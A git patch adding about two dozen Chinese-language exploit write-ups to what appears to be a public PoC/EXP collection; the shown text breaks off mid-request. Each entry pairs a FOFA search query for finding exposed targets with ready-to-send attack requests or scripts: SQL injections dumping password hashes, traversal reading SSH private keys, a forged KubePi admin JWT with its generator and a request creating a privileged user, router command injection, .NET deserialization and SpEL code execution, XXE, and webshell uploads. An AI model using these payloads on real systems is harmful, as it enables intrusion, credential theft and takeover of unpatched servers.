From f228c4e9648313bdb642634ebefbe1db8570620e Mon Sep 17 00:00:00 2001 From: wy876 Date: Thu, 1 Aug 2024 20:05:27 +0800 Subject: [PATCH] =?UTF-8?q?8.1=E6=9B=B4=E6=96=B0=E6=BC=8F=E6=B4=9E?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 3C环境自动监测监控系统ReadLog文件读取漏洞.md | 33 ++++++ AspCMS系统commentList.asp存在SQL注入漏洞.md | 17 +++ ClusterControl存在任意文件读取漏洞.md | 16 +++ KubePi存在JWT验证绕过漏洞(CVE-2024-36111).md | 104 ++++++++++++++++++ Quicklancer系统接口listing存在SQL注入漏洞.md | 19 ++++ README.md | 30 ++++- ...-FH1201存在命令注入漏洞(CVE-2024-41468).md | 27 +++++ ...-FH1201存在命令注入漏洞(CVE-2024-41473).md | 26 +++++ ...台getAutoCode存在SQL注入漏洞(XVE-2024-18749).md | 18 +++ ...行协同CRM系统UploadFile存在反序列化漏洞.md | 31 ++++++ ...数据日志审计系统sprog_upstatus.php存在SQL注入漏洞.md | 23 ++++ ...电子签章平台ukeysign存在远程命令执行漏洞.md | 25 +++++ ...达OA系统GetSSOStamp接口存在任意用户登录.md | 32 ++++++ ...A系统接口ConfigService.asmx存在SQL注入漏洞.md | 30 +++++ ...慧平台系统GetCustomerLinkman存在sql注入漏洞.md | 22 ++++ ...慧平台系统Upload.ashx存在任意文件上传漏洞.md | 32 ++++++ ...y系统接口ReceiveCCRequestByXml存在XXE漏洞.md | 23 ++++ ...安防管理平台clusters接口存在任意文件上传漏洞.md | 37 +++++++ ...管理平台licenseExpire存在前台远程命令执行漏洞.md | 42 +++++++ ...系统bind-ip远程代码执行漏洞(XVE-2024-18750).md | 20 ++++ ...nloadWebFile存在任意文件读取漏洞(XVE-2024-18926).md | 11 ++ ...NC-Cloud系统queryPsnInfo存在SQL注入漏洞.md | 21 ++++ ...-Cloud系统queryStaffByName存在SQL注入漏洞.md | 22 ++++ ...loud系统ESBInvokerServlet存在反序列化漏洞.md | 24 ++++ ...联FE协作办公平台apprvaddNew存在sql注入漏洞.md | 20 ++++ ...管理系统AuthToken接口存在任意账号登录漏洞.md | 20 ++++ 26 files changed, 724 insertions(+), 1 deletion(-) create mode 100644 3C环境自动监测监控系统ReadLog文件读取漏洞.md create mode 100644 AspCMS系统commentList.asp存在SQL注入漏洞.md create mode 100644 ClusterControl存在任意文件读取漏洞.md create mode 100644 KubePi存在JWT验证绕过漏洞(CVE-2024-36111).md create mode 100644 Quicklancer系统接口listing存在SQL注入漏洞.md create mode 100644 Tenda-FH1201存在命令注入漏洞(CVE-2024-41468).md create mode 100644 Tenda-FH1201存在命令注入漏洞(CVE-2024-41473).md create mode 100644 万户ezOFFICE协同管理平台getAutoCode存在SQL注入漏洞(XVE-2024-18749).md create mode 100644 任我行协同CRM系统UploadFile存在反序列化漏洞.md create mode 100644 北京派网软件有限公司Panabit-Panalog大数据日志审计系统sprog_upstatus.php存在SQL注入漏洞.md create mode 100644 契约锁电子签章平台ukeysign存在远程命令执行漏洞.md create mode 100644 广联达OA系统GetSSOStamp接口存在任意用户登录.md create mode 100644 广联达OA系统接口ConfigService.asmx存在SQL注入漏洞.md create mode 100644 方天云智慧平台系统GetCustomerLinkman存在sql注入漏洞.md create mode 100644 方天云智慧平台系统Upload.ashx存在任意文件上传漏洞.md create mode 100644 泛微E-Cology系统接口ReceiveCCRequestByXml存在XXE漏洞.md create mode 100644 海康威视综合安防管理平台clusters接口存在任意文件上传漏洞.md create mode 100644 海康威视综合安防管理平台licenseExpire存在前台远程命令执行漏洞.md create mode 100644 深澜计费管理系统bind-ip远程代码执行漏洞(XVE-2024-18750).md create mode 100644 满客宝智慧食堂系统downloadWebFile存在任意文件读取漏洞(XVE-2024-18926).md create mode 100644 用友NC-Cloud系统queryPsnInfo存在SQL注入漏洞.md create mode 100644 用友NC-Cloud系统queryStaffByName存在SQL注入漏洞.md create mode 100644 用友u8-cloud系统ESBInvokerServlet存在反序列化漏洞.md create mode 100644 致远互联FE协作办公平台apprvaddNew存在sql注入漏洞.md create mode 100644 赛蓝企业管理系统AuthToken接口存在任意账号登录漏洞.md diff --git a/3C环境自动监测监控系统ReadLog文件读取漏洞.md b/3C环境自动监测监控系统ReadLog文件读取漏洞.md new file mode 100644 index 0000000..bf8b729 --- /dev/null +++ b/3C环境自动监测监控系统ReadLog文件读取漏洞.md @@ -0,0 +1,33 @@ +# 3C环境自动监测监控系统ReadLog文件读取漏洞 + +3C科技环境自动监测监控系统ReadLog读取报错日志功能点不受访问控制限制,存在任意文件读取漏洞。未经授权的攻击者可以读取服务器上的任意文件,从而获取系统权限和敏感信息。 + +## fofa + +```yaml +icon_hash="-338936081" +``` + +![image-20240801191240895](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408011912982.png) + +## poc + +```yaml +GET /ajax/sys/LogService.ashx?Method=ReadLog&FileName=../web.config HTTP/1.1 +Host: +Accept: text/plain, */*; q=0.01 +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 +X-Requested-With: XMLHttpRequest +Referer: http:/{{Hostname}}/Sys/Log/FileLogList.aspx +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +``` + +![image-20240801191259831](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408011912877.png) + + + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/CKJO9RohFllYOSnfdu_7Xw \ No newline at end of file diff --git a/AspCMS系统commentList.asp存在SQL注入漏洞.md b/AspCMS系统commentList.asp存在SQL注入漏洞.md new file mode 100644 index 0000000..d8abda3 --- /dev/null +++ b/AspCMS系统commentList.asp存在SQL注入漏洞.md @@ -0,0 +1,17 @@ +# AspCMS系统commentList.asp存在SQL注入漏洞 + +AspCMS commentList.asp 存在SQL注入漏洞,攻击者通过漏洞可以获取管理员md5的密码,进行解密后登录获取敏感数据。 + +## fofa + +```yaml +app="ASPCMS" +``` + +## poc + +```asp +/plug/comment/commentList.asp?id=-1%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now(),null,1%20%20frmasterom%20{prefix}user +``` + +![image-20240619131305272](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408011120340.png) \ No newline at end of file diff --git a/ClusterControl存在任意文件读取漏洞.md b/ClusterControl存在任意文件读取漏洞.md new file mode 100644 index 0000000..2b1c21e --- /dev/null +++ b/ClusterControl存在任意文件读取漏洞.md @@ -0,0 +1,16 @@ +# ClusterControl存在任意文件读取漏洞 + + + +## poc + +```yaml +GET /../../../../../../../../..//root/.ssh/id_rsa HTTP/1.1 +Host: +Accept-Encoding: identity +User-Agent: python-urllib3/1.26.4 +``` + +![image.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408011932688.png) + +![image.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408011932059.png) \ No newline at end of file diff --git a/KubePi存在JWT验证绕过漏洞(CVE-2024-36111).md b/KubePi存在JWT验证绕过漏洞(CVE-2024-36111).md new file mode 100644 index 0000000..2fa0a5f --- /dev/null +++ b/KubePi存在JWT验证绕过漏洞(CVE-2024-36111).md @@ -0,0 +1,104 @@ +# KubePi存在JWT验证绕过漏洞(CVE-2024-36111) + +kubepi jwttoken 校验存在缺陷,默认配置文件中jwt密钥为空,虽然读取配置文件相关逻辑中检测到密钥为空时,会生成一个随机32位字符串覆盖配置文件中的密钥,但是实际校验时,密钥为空,使用空密钥生成jwttoken可绕过登录校验,可直接接管后台 + +## fofa + +```java +"kubepi" +``` + +## poc + +![image](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407302144253.png) + +使用空密钥生成jwt token + +```java +eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiYWRtaW4iLCJuaWNrTmFtZSI6IkFkbWluaXN0cmF0b3IiLCJlbWFpbCI6InN1cHBvcnRAZml0MmNsb3VkLmNvbSIsImxhbmd1YWdlIjoiemgtQ04iLCJyZXNvdXJjZVBlcm1pc3Npb25zIjp7fSwiaXNBZG1pbmlzdHJhdG9yIjp0cnVlLCJtZmEiOnsiZW5hYmxlIjpmYWxzZSwic2VjcmV0IjoiIiwiYXBwcm92ZWQiOmZhbHNlfSwiaWF0IjoxNzE2NDQ3MDEyLCJleHAiOjE3MjI0NDcwMTJ9.dedNLwXZu0JY1sgGBCRZmpFvAnLdHjxdPmKWXA7LCf4 +``` + +使用生成的密钥创建用户tang + +```java +POST /kubepi/api/v1/users HTTP/1.1 +Host: 127.0.0.1:9982 +Content-Length: 248 +sec-ch-ua: +Accept: application/json, text/plain, */* +lang: zh-CN +Content-Type: application/json +sec-ch-ua-mobile: ?0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 +sec-ch-ua-platform: "" +Origin: http://127.0.0.1:9982 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Referer: http://127.0.0.1:9982/kubepi/user-management/users/create +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiYWRtaW4iLCJuaWNrTmFtZSI6IkFkbWluaXN0cmF0b3IiLCJlbWFpbCI6InN1cHBvcnRAZml0MmNsb3VkLmNvbSIsImxhbmd1YWdlIjoiemgtQ04iLCJyZXNvdXJjZVBlcm1pc3Npb25zIjp7fSwiaXNBZG1pbmlzdHJhdG9yIjp0cnVlLCJtZmEiOnsiZW5hYmxlIjpmYWxzZSwic2VjcmV0IjoiIiwiYXBwcm92ZWQiOmZhbHNlfSwiaWF0IjoxNzE2NDQ3MDEyLCJleHAiOjE3MjI0NDcwMTJ9.dedNLwXZu0JY1sgGBCRZmpFvAnLdHjxdPmKWXA7LCf4 +Connection: close + +{"apiVersion":"v1","kind":"User","name":"tang","roles":["Common User","Manage Image Registries","Manage Clusters","Manage RBAC"],"nickName":"tang","email":"tang@qq.com","authenticate":{"password":"12345678@Tang"},"mfa":{"enable":false,"secret":""}} +``` + +![image](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407302142936.png) + +![image](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407302142055.png) + +## 生成jwt token程序 + +```go +package main + +import ( + "fmt" + "github.com/kataras/iris/v12/middleware/jwt" + "time" +) + +var jwtMaxAge = 100000 * time.Minute + +type UserProfile struct { + Name string `json:"name"` + NickName string `json:"nickName"` + Email string `json:"email"` + Language string `json:"language"` + ResourcePermissions map[string][]string `json:"resourcePermissions"` + IsAdministrator bool `json:"isAdministrator"` + Mfa Mfa `json:"mfa"` +} + +type Mfa struct { + Enable bool `json:"enable"` + Secret string `json:"secret"` + Approved bool `json:"approved"` +} + +func main() { + jwtSigner := jwt.NewSigner(jwt.HS256, "", jwtMaxAge) + test := map[string][]string{} + profile := UserProfile{ + Name: "admin", + NickName: "Administrator", + Email: "support@fit2cloud.com", + Language: "zh-CN", + ResourcePermissions: test, + IsAdministrator: true, + Mfa: Mfa{ + Secret: "", + Enable: false, + Approved: false, + }, + } + nonejwt, _ := jwtSigner.Sign(profile) + fmt.Println(string(nonejwt)) +} + +``` + +## 漏洞来源 + +- https://github.com/1Panel-dev/KubePi/security/advisories/GHSA-8q5r-cvcw-4wx7 \ No newline at end of file diff --git a/Quicklancer系统接口listing存在SQL注入漏洞.md b/Quicklancer系统接口listing存在SQL注入漏洞.md new file mode 100644 index 0000000..e9237a2 --- /dev/null +++ b/Quicklancer系统接口listing存在SQL注入漏洞.md @@ -0,0 +1,19 @@ +# Quicklancer系统接口listing存在SQL注入漏洞 + + + +## fofa + +```java +"service_fragments/css/gig_detail.css" +``` + +## poc + +```java +GET /listing?cat=6&filter=1&job-type=1&keywords=Mr.&location=1&order=desc&placeid=US&placetype=country&range1=1&range2=1) AND 6477=6477 AND (1232=1232&salary-type=1&sort=id&subcat= HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 +``` + +![image-20240730213839364](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407302138415.png) \ No newline at end of file diff --git a/README.md b/README.md index 03c4523..d4f6b4c 100644 --- a/README.md +++ b/README.md @@ -1,5 +1,33 @@ # 漏洞收集 -收集整理漏洞EXP/POC,大部分漏洞来源网络,目前收集整理了800多个poc/exp,善用CTRL+F搜索 +收集整理漏洞EXP/POC,大部分漏洞来源网络,目前收集整理了900多个poc/exp,善用CTRL+F搜索 + +## 2024.08.01 新增漏洞 + +- 海康威视综合安防管理平台licenseExpire存在前台远程命令执行漏洞 +- 北京派网软件有限公司Panabit-Panalog大数据日志审计系统sprog_upstatus.php存在SQL注入漏洞 +- Quicklancer系统接口listing存在SQL注入漏洞 +- KubePi存在JWT验证绕过漏洞(CVE-2024-36111) +- Tenda-FH1201存在命令注入漏洞(CVE-2024-41473) +- Tenda-FH1201存在命令注入漏洞(CVE-2024-41468) +- 海康威视综合安防管理平台clusters接口存在任意文件上传漏洞 +- 广联达OA系统接口ConfigService.asmx存在SQL注入漏洞 +- 广联达OA系统GetSSOStamp接口存在任意用户登录 +- 方天云智慧平台系统Upload.ashx存在任意文件上传漏洞 +- 用友NC-Cloud系统queryStaffByName存在SQL注入漏洞 +- 用友NC-Cloud系统queryPsnInfo存在SQL注入漏洞 +- 契约锁电子签章平台ukeysign存在远程命令执行漏洞 +- AspCMS系统commentList.asp存在SQL注入漏洞 +- 满客宝智慧食堂系统downloadWebFile存在任意文件读取漏洞(XVE-2024-18926) +- 万户ezOFFICE协同管理平台getAutoCode存在SQL注入漏洞(XVE-2024-18749) +- 深澜计费管理系统bind-ip远程代码执行漏洞(XVE-2024-18750) +- 任我行协同CRM系统UploadFile存在反序列化漏洞 +- 方天云智慧平台系统GetCustomerLinkman存在sql注入漏洞 +- 用友u8-cloud系统ESBInvokerServlet存在反序列化漏洞 +- 3C环境自动监测监控系统ReadLog文件读取漏洞 +- ClusterControl存在任意文件读取漏洞 +- 泛微E-Cology系统接口ReceiveCCRequestByXml存在XXE漏洞 +- 致远互联FE协作办公平台apprvaddNew存在sql注入漏洞 +- 赛蓝企业管理系统AuthToken接口存在任意账号登录漏洞 ## 2024.07.30 新增漏洞 diff --git a/Tenda-FH1201存在命令注入漏洞(CVE-2024-41468).md b/Tenda-FH1201存在命令注入漏洞(CVE-2024-41468).md new file mode 100644 index 0000000..c190df1 --- /dev/null +++ b/Tenda-FH1201存在命令注入漏洞(CVE-2024-41468).md @@ -0,0 +1,27 @@ +# Tenda-FH1201存在命令注入漏洞(CVE-2024-41468) + +Tenda FH1201 v1.2.0.14存在命令注入漏洞,位于exeCommand函数中,cmdinput参数未经任何过滤就被复制到栈空间v7中,然后执行,因此攻击者可以利用该漏洞执行任意命令 + +固件下载网站:https://www.tendacn.com/download/detail-3322.html + +![image-20240730214911627](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407302149682.png) + +## poc + +```python +import requests + +ip = '192.168.74.145' + +url = f"http://{ip}/goform/exeCommand" + + +data = "cmdinput=ls;" +ret = requests.post(url=url,data=data) +``` + +![image-20240730214940461](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407302149496.png) + +## 漏洞来源 + +- https://github.com/iotresearch/iot-vuln/blob/main/Tenda/FH1201/exeCommand/README.md \ No newline at end of file diff --git a/Tenda-FH1201存在命令注入漏洞(CVE-2024-41473).md b/Tenda-FH1201存在命令注入漏洞(CVE-2024-41473).md new file mode 100644 index 0000000..64c2118 --- /dev/null +++ b/Tenda-FH1201存在命令注入漏洞(CVE-2024-41473).md @@ -0,0 +1,26 @@ +# Tenda-FH1201存在命令注入漏洞(CVE-2024-41473) + +Tenda FH1201 v1.2.0.14 存在命令注入漏洞,位于 WriteFacMac 函数中。mac 参数未经任何过滤就被复制到 var 中,然后执行,因此攻击者可利用此漏洞执行任意命令 + +固件下载网址:https://www.tendacn.com/download/detail-3322.html + +![image-20240730214702940](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407302147986.png) + +## poc + +```python +import requests + +ip = '192.168.74.145' + +url = "http://" + ip + "/goform/WriteFacMac" +payload = ";echo 'hacker!'" + +data = {"mac": payload} +response = requests.post(url, data=data) +print(response.text) +``` + +## 漏洞来源 + +- https://github.com/iotresearch/iot-vuln/tree/main/Tenda/FH1201/WriteFacMac \ No newline at end of file diff --git a/万户ezOFFICE协同管理平台getAutoCode存在SQL注入漏洞(XVE-2024-18749).md b/万户ezOFFICE协同管理平台getAutoCode存在SQL注入漏洞(XVE-2024-18749).md new file mode 100644 index 0000000..817eaaa --- /dev/null +++ b/万户ezOFFICE协同管理平台getAutoCode存在SQL注入漏洞(XVE-2024-18749).md @@ -0,0 +1,18 @@ +# 万户ezOFFICE协同管理平台getAutoCode存在SQL注入漏洞(XVE-2024-18749) + +万户ezOFFICE协同管理平台 `/defaultroot/platform/custom/customizecenter/js/getAutoCode.jsp`接口处存在sql注入漏洞,攻击者可获取数据库中敏感信息 + +## fofa + +```yaml +app="万户网络-ezOFFICE" +``` + + +## poc + +```yaml +GET /defaultroot/platform/custom/customizecenter/js/getAutoCode.jsp;.js?pageId=1&head=2%27+AND+6205%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2898%29%7C%7CCHR%2866%29%7C%7CCHR%2890%29%7C%7CCHR%28108%29%2C5%29--+YJdO&field=field_name&tabName=tfield HTTP/1.1 +Host: +``` + diff --git a/任我行协同CRM系统UploadFile存在反序列化漏洞.md b/任我行协同CRM系统UploadFile存在反序列化漏洞.md new file mode 100644 index 0000000..1ae01a5 --- /dev/null +++ b/任我行协同CRM系统UploadFile存在反序列化漏洞.md @@ -0,0 +1,31 @@ +# 任我行协同CRM系统UploadFile存在反序列化漏洞 + + + +## fofa + +```yaml +"欢迎使用任我行CRM" +``` + +## poc + +```java +POST /SystemManage/UploadFile HTTP/1.1 +Host: {{Hostname}} +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like +Gecko) Chrome/83.0.4103.116 Safari/537.36 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded + +photoInfo={ +'$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35', 'MethodName':'Start', 'MethodParameters':{ +'$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089', '$values':['cmd', '/c whoami'] +},'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'} +} +``` + diff --git a/北京派网软件有限公司Panabit-Panalog大数据日志审计系统sprog_upstatus.php存在SQL注入漏洞.md b/北京派网软件有限公司Panabit-Panalog大数据日志审计系统sprog_upstatus.php存在SQL注入漏洞.md new file mode 100644 index 0000000..a957170 --- /dev/null +++ b/北京派网软件有限公司Panabit-Panalog大数据日志审计系统sprog_upstatus.php存在SQL注入漏洞.md @@ -0,0 +1,23 @@ +# 北京派网软件有限公司Panabit-Panalog大数据日志审计系统sprog_upstatus.php存在SQL注入漏洞 + +北京派网软件有限公司Panabit-Panalog大数据日志审计系统sprog_upstatus.php存在SQL注入漏洞,攻击者利用该漏洞可获取数据库权限。 + +## fofa + +```java +body="Maintain/cloud_index.php" +``` + +## poc + +```java +GET /Maintain/sprog_upstatus.php?status=1&id=1%20and%20updatexml(1,concat(0x7e,user()),0)&rdb=1 HTTP/1.1 +Host: +Accept-Encoding: gzip, deflate, br, zstd +Accept-Language: zh-CN,zh;q=0.9 +Cache-Control: max-age=0 +Connection: keep-alive +Cookie: PHPSESSID=f8la8ttr74fkge0pttpc626p45 +``` + +![image-20240730213144361](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407302131431.png) \ No newline at end of file diff --git a/契约锁电子签章平台ukeysign存在远程命令执行漏洞.md b/契约锁电子签章平台ukeysign存在远程命令执行漏洞.md new file mode 100644 index 0000000..a028e29 --- /dev/null +++ b/契约锁电子签章平台ukeysign存在远程命令执行漏洞.md @@ -0,0 +1,25 @@ +# 契约锁电子签章平台ukeysign存在远程命令执行漏洞 + +契约锁电子签章平台 `/contract/ukeysign/.%2e/.%2e/template/param/edits `接口处存在远程代码执行漏洞,未经身份验证的攻击者可通过tomcat对路径参数解析不正当的特性绕过权限认证在目标执行恶意代码,获取服务器权限。经过分析和研判,该漏洞利用难度低,可导致远程代码执行,建议尽快修复。 + +## fofa + +```java +app="契约锁-电子签署平台" +``` + +## poc + +```java +POST /contract/ukeysign/.%2e/.%2e/template/param/edits HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like +Gecko) Chrome/113.0.0.0 Safari/537.36 +Content-Type: application/json + +{"id":"2","params":[{"expression":"var a=new +org.springframework.expression.spel.standard.SpelExpressionParser();var b='SpEL 表达式的 base64 编 +码';var b64=java.util.Base64.getDecoder();var deStr=new java.lang.String(b64.decode(b),'UTF- +8');var c=a.parseExpression(deStr);c.getValue();"}]} +``` + diff --git a/广联达OA系统GetSSOStamp接口存在任意用户登录.md b/广联达OA系统GetSSOStamp接口存在任意用户登录.md new file mode 100644 index 0000000..0fc56c8 --- /dev/null +++ b/广联达OA系统GetSSOStamp接口存在任意用户登录.md @@ -0,0 +1,32 @@ +# 广联达OA系统GetSSOStamp接口存在任意用户登录 + + + +## fofa + +```java +header="Services/Identification/login.ashx" || banner="Services/Identification/login.ashx" +``` + +## poc + +```java +POST /WebService/Lk6SyncService/DirectToOthers/GetSSOStamp.asmx HTTP/1.1 +Host: +Accept: */* Accept-Language: zh-CN,zh;q=0.9 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 +Content-Type: text/xml; charset=utf-8 +Content-Length: 350 +SOAPAction: "http://tempuri.org/GetStamp" + + + + + + +admin + + + +``` + diff --git a/广联达OA系统接口ConfigService.asmx存在SQL注入漏洞.md b/广联达OA系统接口ConfigService.asmx存在SQL注入漏洞.md new file mode 100644 index 0000000..a94b020 --- /dev/null +++ b/广联达OA系统接口ConfigService.asmx存在SQL注入漏洞.md @@ -0,0 +1,30 @@ +# 广联达OA系统接口ConfigService.asmx存在SQL注入漏洞 + +广联达OA系统接口 `/Webservice/IM/Config/ConfigService.asmx` 存在SQL注入漏洞。 + +## fofa + +```yaml +header="Services/Identification/login.ashx" || banner="Services/Identification/login.ashx" +``` + +## poc + +```xml +POST /Webservice/IM/Config/ConfigService.asmx HTTP/1.1 +Host: {{Hostname}} +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like +Gecko) Chrome/123.0.6312.88 Safari/537.36 +Content-Type: text/xml;charset=UTF-8 + + + + + +1' UNION ALL SELECT top 1812 concat(F_CODE,':',F_PWD_MD5) from +T_ORG_USER -- + + + +``` + diff --git a/方天云智慧平台系统GetCustomerLinkman存在sql注入漏洞.md b/方天云智慧平台系统GetCustomerLinkman存在sql注入漏洞.md new file mode 100644 index 0000000..fe80488 --- /dev/null +++ b/方天云智慧平台系统GetCustomerLinkman存在sql注入漏洞.md @@ -0,0 +1,22 @@ + # 方天云智慧平台系统GetCustomerLinkman存在sql注入漏洞 + + + +## fofa + +```yaml +body="AjaxMethods.asmx/GetCompanyItem" +``` + +## poc + +``` +POST /WXAPI.asmx/GetCustomerLinkman HTTP/1.1 +Host: ip +Cookie: ASP.NET_SessionId=pb453i5abddajnqakas2ax1e +Content-Type: application/json +Content-Length: 300 + +{clmID:"1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(120)+CHAR(122)+CHAR(106)+CHAR(113)+IS NULL(CAST(DB_NAME() AS NVARCHAR(4000)),CHAR(32))+CHAR(113)+CHAR(106)+CHAR(120)+CHAR(122)+CHAR(113),NULL,NULL-- OSZH"} +``` + diff --git a/方天云智慧平台系统Upload.ashx存在任意文件上传漏洞.md b/方天云智慧平台系统Upload.ashx存在任意文件上传漏洞.md new file mode 100644 index 0000000..c4fcd2b --- /dev/null +++ b/方天云智慧平台系统Upload.ashx存在任意文件上传漏洞.md @@ -0,0 +1,32 @@ +# 方天云智慧平台系统Upload.ashx存在任意文件上传漏洞 + +方天云智慧平台系统 Upload.ashx 接口处存在任意文件上传漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。 + +## fofa + +```java +body="AjaxMethods.asmx/GetCompanyItem" +``` + +## poc + +```java +POST /Upload.ashx HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySl8siBbmVicABvTX +Connection: close + +------WebKitFormBoundarySl8siBbmVicABvTX +Content-Disposition: form-data; name="file"; filename="qwe.aspx" +Content-Type: image/jpeg + +<%@Page Language="C#"%><%Response.Write("hello");System.IO.File.Delete(Request.PhysicalPath);%> +------WebKitFormBoundarySl8siBbmVicABvTX-- +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407311743390.png) + +文件路径:`/UploadFile/CustomerFile/回显的路径` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407311744590.png) \ No newline at end of file diff --git a/泛微E-Cology系统接口ReceiveCCRequestByXml存在XXE漏洞.md b/泛微E-Cology系统接口ReceiveCCRequestByXml存在XXE漏洞.md new file mode 100644 index 0000000..7aaa1f3 --- /dev/null +++ b/泛微E-Cology系统接口ReceiveCCRequestByXml存在XXE漏洞.md @@ -0,0 +1,23 @@ +# 泛微E-Cology系统接口ReceiveCCRequestByXml存在XXE漏洞 + +泛微e-cology是一款由泛微网络科技开发的协同管理平台,支持人力资源、财务、行政等多功能管理和移动办公。泛微e-cology系统接口`/rest/ofs/ReceiveCCRequestByXml` 存在XXE漏洞 + +## fofa + +```java +app="泛微-协同商务系统" +``` + +## poc + +```java +POST /rest/ofs/ReceiveCCRequestByXml HTTP/1.1 +Host:{{Hostname}} +User-Agent:Mozilla/5.0(WindowsNT10.0;WOW64)AppleWebKit/537.36(KHTML, likeGecko)Chrome/71.0.3578.98Safari/537.36 +Content-Type:application/xml + + + +&send; +``` + diff --git a/海康威视综合安防管理平台clusters接口存在任意文件上传漏洞.md b/海康威视综合安防管理平台clusters接口存在任意文件上传漏洞.md new file mode 100644 index 0000000..cee84b8 --- /dev/null +++ b/海康威视综合安防管理平台clusters接口存在任意文件上传漏洞.md @@ -0,0 +1,37 @@ +# 海康威视综合安防管理平台clusters接口存在任意文件上传漏洞 + +海康威视综合安防管理平台 `/clusterMgr/clusters/ssl/file` 存在远程命令执行漏洞,未经身份验证的远程攻击者可通过该漏洞在服务器端任意执行代码。 + +## fofa + +```yaml +app="HIKVISION-综合安防管理平台" +``` + +## poc + +```java +POST /clusterMgr/clusters/ssl/file;.js HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) +Chrome/112.0.0.0 Safari/537.36 HTML +Accept: */* +Host: 8.8.8.8:1443 +Accept-Encoding: gzip, deflate +Connection: close +Content-Type: multipart/form-data; boundary=--------------------------984514492333278399715408 +Content-Length: 339 + +----------------------------984514492333278399715408 +Content-Disposition: form-data; name="file"; filename="languages/default.jsp" +Content-Type: image/png + +<%=123%> +----------------------------984514492333278399715408 +Content-Disposition: form-data; name="proxyAddress" + +8.8.8.8 +----------------------------984514492333278399715408-- +``` + +文件地址`/clusterMgr/languages/default.jsp;.js` + diff --git a/海康威视综合安防管理平台licenseExpire存在前台远程命令执行漏洞.md b/海康威视综合安防管理平台licenseExpire存在前台远程命令执行漏洞.md new file mode 100644 index 0000000..316f91a --- /dev/null +++ b/海康威视综合安防管理平台licenseExpire存在前台远程命令执行漏洞.md @@ -0,0 +1,42 @@ +# 海康威视综合安防管理平台licenseExpire存在前台远程命令执行漏洞 + +海康威视综合安防管理平台 `/portal/cas/login/ajax/licenseExpire.do` 存在远程命令执行漏洞,未经身份验证的远程攻击者可通过该漏洞在服务器端任意执行代码。 + +## fofa + +```yaml +app="HIKVISION-综合安防管理平台" +``` + +## poc + +``` +POST /portal/cas/login/ajax/licenseExpire.do HTTP/1.1 +Host: +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 + +{"type":"environment","operate":"","machines":{"id":"$(ping+qsdiehtuxn.dgrh3.cn)"} +``` + +```java +POST 